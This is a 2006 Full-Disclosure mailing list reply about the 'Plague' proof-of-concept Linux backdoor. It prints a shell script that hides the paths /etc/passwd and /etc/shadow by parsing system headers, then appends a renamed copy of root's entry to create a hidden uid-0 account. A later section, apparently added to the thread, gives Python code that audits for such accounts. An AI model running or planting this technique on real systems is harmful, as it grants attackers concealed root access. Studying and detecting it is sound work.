Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)
From: hijacker@...um.net
To: "Andrew Farmer" <andfarm@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Plague Proof of Concept Linux backdoor

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completely off the subject and at the same time some of
them offensive to me!

Let's go into more details on that backdoor.

I created the file test1.sh containing:

hijacker@hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I ran chmod 700 test1.sh,
then I ran:

hijacker@hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


> On 22 Oct 06, at 04:29, hijacker@...um.net wrote:
>> even if they have ssh access, there is still nothing they can do, except
>> to create two files in their $HOME directories containing expressions from
>> paths.h and sysexits.h ?
>>
>> Why would that be considered a backdoor?
>
> The awk commands parse out the strings "/etc/passwd" and "/etc/shadow" from
> the headers. It's still rather easily detected - most of the rootkit-checking
> programs will detect an alternate uid0 account very quickly - but it
> does demonstrate an interesting way of avoiding target strings in the binary.

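Andrew's point in the quoted reply is that an extra uid-0 account is easy to spot. The following check, added here as an example and not code from either poster, shows what such a detection looks like when run over passwd(5) and shadow(5) data: it flags any uid-0 entry other than root, flags malformed lines (such as what the trailing comma in the script's "/etc/passwd," would have produced had the append succeeded), and flags shadow entries that share a password hash with another account, which is what the sed-based copy of root's line would leave behind. The sample passwd and shadow contents, the hash value and the function names are constructed for this example.

```python
"""Audit passwd/shadow data for cloned or extra uid-0 accounts (added example)."""

# Constructed sample data: root plus a uid-0 clone of the kind the PoC script
# would append (root's own line with the name rewritten).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hijacker:x:1000:1000:Nikolay:/home/hijacker:/bin/bash
plaguePoC:x:0:0:plaguePoC:/plaguePoC:/bin/bash
broken:x:0
"""

# Constructed sample shadow data; the hash string is a placeholder, not a real hash.
SAMPLE_SHADOW = """root:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
hijacker:$6$othersalt$ANOTHERPLACEHOLDER:19000:0:99999:7:::
plaguePoC:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
"""


def parse_passwd(text):
    """Parse passwd(5) text into dicts; blank and comment lines are skipped,
    lines without exactly seven colon-separated fields are marked malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"name": fields[0], "line": lineno, "malformed": True})
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        try:
            entry = {"name": name, "uid": int(uid), "gid": int(gid),
                     "gecos": gecos, "home": home, "shell": shell,
                     "line": lineno, "malformed": False}
        except ValueError:
            # Non-numeric uid/gid: treat as malformed rather than guessing.
            entry = {"name": name, "line": lineno, "malformed": True}
        entries.append(entry)
    return entries


def extra_uid0_accounts(text):
    """Names of well-formed entries with uid 0 other than 'root'."""
    return [e["name"] for e in parse_passwd(text)
            if not e["malformed"] and e["uid"] == 0 and e["name"] != "root"]


def malformed_lines(text):
    """Line numbers of passwd entries that do not parse as seven fields."""
    return [e["line"] for e in parse_passwd(text) if e["malformed"]]


def duplicate_shadow_hashes(text):
    """Groups of account names that share a password hash in shadow(5) data.
    Locked or empty password fields ('*', '!', '!!', '') are ignored."""
    by_hash = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        name, pw_hash = fields[0], fields[1]
        if pw_hash in ("", "*") or pw_hash.startswith("!"):
            continue
        by_hash.setdefault(pw_hash, []).append(name)
    return [names for names in by_hash.values() if len(names) > 1]


def audit(passwd_text, shadow_text):
    """Return a findings dict combining the three checks above."""
    return {
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "malformed_passwd_lines": malformed_lines(passwd_text),
        "shared_hashes": duplicate_shadow_hashes(shadow_text),
    }


if __name__ == "__main__":
    # On a real host you would read /etc/passwd and (as root) /etc/shadow instead.
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{key}: {value}")
```

On a live system the same functions can be fed the contents of /etc/passwd and /etc/shadow; the shared-hash check is the one that catches a copied root line even if the clone is later given a uid other than 0, because the hash, not the uid, is what was duplicated.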

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
